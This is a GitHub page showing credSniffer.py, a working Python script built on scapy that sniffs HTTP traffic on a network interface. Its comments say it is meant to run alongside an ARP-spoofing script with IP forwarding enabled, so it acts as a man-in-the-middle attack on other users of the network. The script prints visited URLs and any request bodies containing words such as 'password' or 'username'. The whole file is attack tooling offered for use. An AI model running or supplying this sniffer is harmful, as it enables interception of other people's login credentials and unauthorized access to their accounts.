-
Notifications
You must be signed in to change notification settings - Fork 2
/
credSniffer.py
70 lines (44 loc) · 1.72 KB
/
credSniffer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#!/usr/bin/python3
# THIS SCRIPT TRIES TO GET TARGET CREDENTIALS
# FROM HTTP WEBSITES RUN AT THE TARGET END
# NOTE:-
# ARPSPOOFER SCRIPT MUST BE RUNNING ALONGSIDE THIS SCRIPT
# AND IP FORWARDING MUST BE ENABLED IN ORDER FOR
# THIS SCRIPT TO WORK PROPERLY
from scapy.all import *
from scapy_http import http
import socket as sc
from struct import *
import sys
from termcolor import colored # use colored text output on the terminal
import optparse as op
words = ["user", "password", "User", "Password", "username", "Username", "Login", "pass", "Pass", "uid"]
def Sniff(interface):
sniff(iface=interface, store=False, prn=process_packets)
def process_packets(pkt):
if pkt.haslayer(http.HTTPRequest): # if the packet to be processed has the HTTP layer
url = pkt[http.HTTPRequest].Host + pkt[http.HTTPRequest].Path # get the URL
print("[!] Activity detected at : " + url.decode())
if pkt.haslayer(Raw): # load whatever message is available in the raw header (credentials passed can be found here)
# print("has load")
load = pkt[Raw].load
# print(load.decode())
for w in words:
if w in str(load):
print(colored("[+] Potential Credentials found:-\n" + load.decode(), "green"))
break
def main():
parser = op.OptionParser("Usage: " + sys.argv[0] + " -i INTERFACE_NAME ")
parser.add_option("-i", dest="interface", type="string", help="Interface to listen on")
(options, args) = parser.parse_args()
if options.interface == None:
print(parser.usage)
quit()
else:
try:
print("[!] Starting the HTTP Credential Sniffer!")
Sniff(options.interface)
except KeyboardInterrupt:
print("[!] Stopping the HTTP Credential Sniffer!")
quit()
main()